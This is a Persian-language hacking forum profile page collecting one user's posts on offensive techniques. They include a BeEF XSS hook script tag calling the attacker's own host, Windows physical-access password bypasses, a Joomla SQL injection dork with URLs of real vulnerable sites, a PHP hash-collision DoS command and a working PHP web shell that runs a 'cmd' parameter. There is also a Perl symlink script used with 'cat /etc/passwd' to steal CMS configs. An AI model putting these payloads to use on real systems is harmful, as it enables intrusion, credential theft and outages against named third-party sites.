html4_4

کاربر انجمن
  • تعداد ارسال ها

    33
  • تاریخ عضویت

  • آخرین بازدید

8 دنبال کننده

درباره html4_4

  • درجه
    1
  • تاریخ تولد 8 شهریور 1394

روش های تماس

  • Yahoo
    html4_4@yahoo.com

اطلاعات فردی

  • جنسیت
    Not Telling

آخرین بازدید کنندگان نمایه

416 بازدید کننده نمایه
  1. html4_4

    Beef Xss

    سلام اصلا نیازی به اپلود نیست خوب دقت کنید beef رو که اجرا میکنی روی کالی یه پنل تحت وب بشما میده و یه آدرس اسکریپت پنل ور بهش لاگین میکنی ادرس اسکریپت رو هم به این شکل عوض کن http://ipvalid:3000/hook.js برای پیدا کردن ای پی تونم فقط کافیه my ip رو تو گوگل سرچ کنی حالا این کد رو جای که این اسیب پذیری هست قرار میدی <script src="http://ipvalid:3000/hook.js" type="text/javascript"></script> و وارد پنل beef میشی و منتظر میمونی
  2. html4_4

    Beef Xss

    خودت تغییرباید بدی مثلا http://ipvalid:3000/hook.js بعد پورت رو فوروارد میکنی به ip local کالی
  3. html4_4

    Beef Xss

    سلام اگر از کالی استفاده میکنی نیازی به نصب نداره و نیازی نیست که حتما روی یه سرور اجرا بشه
  4. استفاده از ابزارهای خود ویندوز خود ویندوز هم یک سری ابزار را در اختیار ما گذاشته که حتی بدون دانستن پسورد قبلی پسورد های جدید برای حساب های کاربری انتخاب کنیم این ابزارها در محیط های Administrator و Power User و یا حسابی که این اجازه به آن داده شده قابل استفاده است مثلا حساب های کاربری که هنگام نصب ویندوز ساخته میشوند این اجازه رو دارند خوب بریم سراغ آموزش : User Accounts Control Userpassword2 Win Key + R --> control userpasswords2 --> enter وارد Run بشید و کلمه control userpasswords2 رو وارد کنید و اینتر بزنید پنجره زیر باز میشه حساب کاربری مورد نظر خودتونو انتخاب کنید و دکمه Rest Password رو انتخاب کنید در کادر خواسته شده پسورد جدید رو وارد کنید نیازی به پسورد قبلی نیست
  5. بخش دوم تا حالا شده به این فکر کنید که سیستم چه طوری متوجه میشه که ما username و password رو درست وارد کردیم؟ این به این معنی که که حساب های کاربری و پسوردها سیستم داخل یک فایل یا database ذخیره میشه این فرایند با استفاده از LSA (Local Security Authority ) انجام میشه هر بار که کاربر قصد ورود به سیستم رو داره پسورد ورودی توسط LSA به پایگاه داده ای به اسم SAM که کلیه پسورد ها را در خود دارد فرستاده میشه و مقایسه انجام میشه . بریم سراغ اولین آموزش : ورود به حساب کاربری Administrator اولین روش در عبور از پسورد در ویندوز XP : قبل از ورود به ویندوز در Welcom Screen کلید های : Ctrl + Alt + Duble Delete رو بزنید پنجره زیر باز میشه: نام کاربری رو Administrator و کادر پسورد رو خالی بزارید و Enter اگر صفحه Welcom Screen ظاهر نشده ویندوز رو در حالت Safe Mode بالا بیارید نکته : این روش در ویندوز 7 و ویستا عملی نیست چونکه پیش فرض حساب کاربری Administrator غیرفعل هستش برای فعال کردن از این دستور استفاده کنید : Net user Administrator password /active:yes روش مقابله : گذاشتن پسورد روی حساب کاربری Administrator موقع نصب ویندوز پسورد Administrator رو خالی نزارید
  6. حساب های کاربری و کلمات عبور ما از حساب های کاربری و کلمات عبور برای شناساندن کاربران به سیستم عامل و برای جلوگیری از ورود افراد ناشناس به حساب کاربری استفاده میکنیم در فرایند احراز هویت دو معیار کلی یعنی حساب کاربری و کلمه عبور(در صورت وجود) از کاربر درخواست میشود نکته امنیتی : از اسامی admin و Administrator و modir در نامهای کاربری استفاده نکنید نکته امنیتی : نام کاربری طوری تعیین شود که نمایشگر اطلاعت شخصی کاربر مثل (نام و نام خانوادگی) نباشد گروهای کاربری گروه های کاربری به دودسته تقسیم میشوند : گروه های موجود در یک سیستم محلی(Local) که به سه گروه تقسیم می شوند : 1. گروه مدیران سیستم 2. گروه کاربران محدود شده 3. گروه کاربران مهمان فرق این سه گروه رو میتونید در جدول زیر مشاهده کنید : این گروه هم خود داری انواع مختلف هست که طبق نیاز کاربر باید هر کاربری را عضو یکی از گروه ها کنیم در اینجا به چند مورد اشاره میکینم گروه های موجود در یک شبکه اعضای این گروه هنگامی کاربرد دارند که ما عضوی یک دامنه کاری یا یک شبکه باشیم هنگام ایجاد محدودیت ها و دادن مجوزها بر روی منابع به اشتراک گذاشته شده در شبکه این گروه ارزش زیادی دارند دراینجا به ذکر چند مورد می پردازیم: نکته امنیتی :همیشه مراقب تعداد حساب های کاربری و حسابهای کاربری بلااستفاده ای که در شبکه موجود است باشید نکته امنیتی : ایجاد یک کاربر قلابی با نام Administrator نکته امنیتی : جایگزین کردن گروه Everyone با گروه Authenticated Users بر روی پوشه های به اشتراک گذاشته شده
  7. سلام با اموزش های هک و امنیت در سیستم عامل ویندوز فقط در دسترسی های فیزیکی در خدمتتون هستم من از مقاله اقای مسلم حقیقیان استفاده میکنم و تجربیات خودم رو هم بهش اضافه میکنم آموزش رو از پایه شروع میکنیم امیدوارم مفید واقع بشه اگر سوال یا مطلبی بود به صورت پ.خ مطرح کنید
  8. html4_4

    کمک در نصب آفیس

    تو که میخواستی اینارو نصب کنی برای چی کالی نصب کردی؟ بهترین کار برای شما نصب کالی روی virtualbox یا vmware هستش
  9. html4_4

    اکسپلویت جوملا com_youtubegallery

    سلام خدمت دوستان گرامی Joomla com_youtubegallery Sql injection دورک : inurl:option?=com_youtubegallery themeid= نمونه سایت ها با این آسیب پذیری : http://www.responsiblemines.org/arm/index.php?option=com_youtubegallery&view=youtubegallery&listid=1&themeid=1%27&videoid=0N4DGhXYFKw&tmpl=component&TB_iframe=true&width=600&height=400 http://www.chevalierusa.com/index.php?option=com_youtubegallery&view=youtubegallery&listid=3&themeid=1%27&videoid=2V_GHKVs4N0&tmpl=component&TB_iframe=true&height=400&width=600 http://www.icetrek.com/index.php?option=com_youtubegallery&view=youtubegallery&listid=7&themeid=10%27&videoid=Y2NVj4CMUYc&tmpl=component&TB_iframe=true&width=910&height=550 http://www.libertyftpierce.com/index.php?option=com_youtubegallery&view=gallery&listid=1&themeid=1%27&videoid=155052493&tmpl=component
  10. html4_4

    اکسپلویت PHP Hash Collision

    سلام اگه میشه در باره این اکسبلویت بیشتر توضیح بدید برای چی هست روش نفوذ ============================ Denial of service همون اتک DOS هستش و ما تو این روش به کمک اکسپلویت کاری میکنیم که دسترسی به یک منبع روی سرور که میتونه Ram یا CPU باشه رو مختل کنیم این روش روی سرور های که منابع رو شیر میکنن و اجازه نمیدن که کاربر بیشتر از یه حدی از منابع استفاده کنه بهتر جواب میده مثل Cloudlinux که البته روش های برای جلوگیر وجود داره مثل همین سایت که تو صفحه اول میتونیم ببینیم و اما روش نفوذ : خیلی از دوستان و بزرگان هک این روش رو یکی از روش های هک نمیدونن چون اصلا نفوذی انجام نمیشه اما چیزی که خود من به این نتیجه رسیدم اینه که بستگی داره هدف شما چی باشه مثلا اگر هدف شما دسترسی به اطلاعات باشه این روش به کارشما نمیاد و اگر هدف شما صدمه زدن به یک سرور یا یک سایت باشه فرض کنید یک سایت فروشگاهی یک روز کامل بالا نیاد اگر اشتباه گفتم دوستان اصلاح کنن
  11. html4_4

    اکسپلویت PHP Hash Collision

    نوع حمله : Denial of service ورژن اسیب پذیر : Affected PHP versions (up to 5.3.8). نحوی استفاده : این ابزار به زبان Python نوشته شده و برای اجرا ورژن requires Python 2.7 نیاز است شکل کلی دستور : python HashtablePOC.py -u https://host/index.php -v -c 1 -w -o output -t PHP نمونه سایت با این اسیب پذیری HashtablePOC.rar
  12. سلام کد رو تو یه فایل php ذخیره کنید مثلا test.php نحوی استفاده میشه http://site.com/test.php?cmd=dir <?php error_reporting(E_ALL); if(isset($_GET['cmd']) and !empty($_GET['cmd'])) { $hadi_ws_kiamarsi= new COM('wscript.shell') or die('Unable TO Load Activex'); $hadi_stdout_kiamarsi=$hadi_ws_kiamarsi->exec($_GET['cmd']); echo '<pre>'; echo $hadi_stdout_kiamarsi->stdout->readall; echo '<pre>'; } ?> تشکر یادتو نره :D
  13. html4_4

    Script Symlink Perl

    سلام خوب مرحله اول شما اسکریپت پرل رو اپلود و پرم 0755 بهش بدید پیشنهاد میکنم که برای خودتون اول یه پوشه درست کنید مرحله دوم فایل htaccess رو دقیقا همونجایی که اسکریپت رو اپلود کردید اپلود کنید بعد اسکریپت رو تو url باز کنید حالا ما نیاز به Passwd داریم که با دستور cat /etc/passwd اون رو میخونیم و تو اسکریپت کپی میکنیم این اسکریپت کانفیگ cms های joomla - wordpress -whm و phpbb رو میگیره تشکر یادتون نره Symlink Priv8.rar
  14. این اکسپلویت با php نوشته شده و کافیه فیلدهای خواسته شده رو پر کنید :ph34r: jce.rar